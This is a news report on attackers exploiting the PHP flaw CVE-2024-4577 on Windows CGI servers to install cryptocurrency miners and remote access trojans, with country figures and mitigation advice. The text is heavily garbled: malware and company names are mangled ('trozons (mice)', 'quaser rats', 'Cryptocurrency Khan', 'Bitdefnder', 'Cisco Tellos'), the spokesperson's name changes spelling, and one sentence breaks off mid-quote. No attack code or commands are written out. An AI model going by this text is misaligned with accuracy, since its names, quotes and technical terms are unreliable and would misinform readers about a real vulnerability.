The actor of the danger is exploiting a serious security defect in PHP to distribute remote access to remote access trozons (mice) like the actor cryptocurrency miners and quaser rats.
The vulnerability, assigned to the cve identifier CVE-2024-4577, refers to an argument injection in the PHP that affects the Windows-based system running in the CGI mode that may allow remote attackers to run the arbitrary code.
Cybercity company Bitdefnder said it has seen an increase in exploitation efforts against CVE -2024-4577 from the end of last year, with a significant concentration in Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%), India (0.33%).
About 15% of the exploitation efforts revealed “Whoami” and “Echo
Technical solution director of Bitdefnder Martin Zugek said that at least 5% of the attacks were concluded in the deployment of XMRIG Cryptocurrency Khan.
“Another small campaign included the deployment of Nicehash miners, a platform that allows users to sell computing power for cryptocurrency,” Zugack said. “The mineral process was disguised as a valid application, such as Javawaindows.exe, to detect.”
Other attacks have been found to make a weapon to make a lack of remote access tools such as the open-source quaser rat, as well as the malicious Windows Installer (MSI) files hosted on distance servers using CMD.Exe.
Perhaps something about a curious twist, the Romanian company said it also saw efforts to modify the firewall configuration on the weak server, blocking the known malicious IPP access to the exploitation.
This abnormal behavior has increased the possibility that rival cryptojacing groups are competing for control over susceptible resources and preventing them from targeting under their control for a second time. It corresponds to historical comments on how cryptjacking attacks are known to eliminate rival miners processes before deploying their own payload.
Shortly after the description of a campaign by Cisco Tellos, this development occurred, which arms PhP defects in attacks that target Japanese organizations since the beginning of the year.
Users are advised to update their PHP installations to protect the latest version from potential hazards.
“Since most of the campaigns are using a lotl tools, organizations should consider limiting the use of devices such as Powershell within the environment, such as only privileged users such as administrators,” Zugack said.
